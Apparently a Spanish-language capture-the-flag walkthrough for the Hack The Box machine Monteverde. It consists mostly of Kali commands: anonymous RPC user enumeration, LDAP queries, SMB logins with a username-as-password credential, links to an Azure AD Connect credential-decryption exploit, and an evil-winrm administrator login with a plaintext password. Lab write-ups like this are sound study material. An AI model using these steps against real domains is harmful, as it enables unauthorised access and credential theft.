# MONTEVERDE   ## SMB  ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MONTEVERDE] └─# echo "10.10.10.172 MEGABANK.LOCAL MONTEVERDE.MEGABANK.LOCAL" >> /etc/hosts ``` ## rpcclient  ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MONTEVERDE] └─# for rid in $(rpcclient -U "" 10.10.10.172 -N -c "enumdomusers" | grep -oP "\[.*?\]" | grep "0x" | tr -d '[]'); do echo; rpcclient -U "" 10.10.10.172 -N -c "queryuser $rid"| grep -Ei "Name|drive|rid|description"; echo;echo "=============================================================================================="; done ```  ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MONTEVERDE] └─# for rid in $(rpcclient -U "" 10.10.10.172 -N -c "enumdomusers" | grep -oP "\[.*?\]" | grep "0x" | tr -d '[]'); do rpcclient -U "" 10.10.10.172 -N -c "queryuser $rid"| grep -Ei "User Name"|awk '{print $4}'; done ```  ## Kerberos - 88  ## CrackMapExec  ## LDAP ``` ┌──(root💀kali)-[/home/…/Escritorio/HTB/MONTEVERDE/ldap] └─# ldapsearch -x -h 10.10.10.172 -s base ```  ## SMB Con credenciales ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MONTEVERDE] └─# smbmap -H 10.10.10.172 -u 'SABatchJobs' -p 'SABatchJobs' ```  ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MONTEVERDE] └─# smbclient -L //10.10.10.172/ -U 'SABatchJobs' ```     https://vbscrub.com/2020/01/14/azure-ad-connect-database-exploit-priv-esc/ https://github.com/VbScrub/AdSyncDecrypt/releases Subimos los archivos necesarios para escalar privilegios:   ``` ┌──(root💀kali)-[/home/cr4y0/Escritorio/HTB/MONTEVERDE] └─# evil-winrm -i 10.10.10.172 -u administrator -p d0m@in4dminyeah! ```